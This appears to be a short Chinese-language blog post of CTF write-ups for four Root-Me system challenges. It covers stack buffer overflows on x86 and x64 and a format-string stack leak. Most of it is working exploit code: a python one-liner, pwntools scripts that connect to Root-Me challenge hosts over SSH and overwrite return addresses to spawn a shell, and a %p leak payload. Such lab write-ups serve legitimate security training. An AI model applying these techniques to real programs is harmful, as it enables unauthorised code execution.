NEKO

root-me-app-system

2018/10/11

ELF x86 - Stack buffer overflow basic 1

gdb调一下熟悉下gdb的使用方法.

payload:

1
(python -c 'print "a"*40+"DEADBEEF".decode("hex")[::-1]';cat) | ./ch13

不加;cat的话shell会直接退出,因为system(‘/bin/dash’)读到了stdin中的EOF,通过cat占用输入流即可.

ELF x86 - Stack buffer overflow basic 2

gdb下i functionsp shell 看到shell地址

exp.py:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
socket=ssh(host='challenge02.root-me.org',user='app-systeme-ch15',password='app-systeme-ch15',port=2222)

io=socket.process('./ch15')
#elf=ELF('./ch15')

shell_addr=0x08048464

payload='a'*(0x8c-0xc)+p32(shell_addr)
io.sendline(payload)
io.interactive()

ELF x86 - Format string bug basic 1

payload:

1
./ch5 %08p,%08p,%08p,%08p,%08p,%08p,%08p,%08p,%0%08p,%08p,%08p,%08p,%08p,%08p

泄露出来的栈内容解一下

1
2
3
4
5
6
s=[...]
for i in s:
try:
print i.decode('hex')[::-1]
except:
pass

ELF x64 - Stack buffer overflow - basic

exp.py

1
2
3
4
5
6
7
from pwn import *

socket=ssh(host='challenge03.root-me.org',user='app-systeme-ch35',password='app-systeme-ch35',port=2223)
io=socket.process('./ch35')
payload="a"*0x118+"\xe7\x05\x40\x00\x00\x00\x00\x00"
io.sendline(payload)
io.interactive()

原文作者: n3k0

发表日期: October 11th 2018, 10:37:04

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. ELF x86 - Stack buffer overflow basic 1
  2. 2. ELF x86 - Stack buffer overflow basic 2
  3. 3. ELF x86 - Format string bug basic 1
  4. 4. ELF x64 - Stack buffer overflow - basic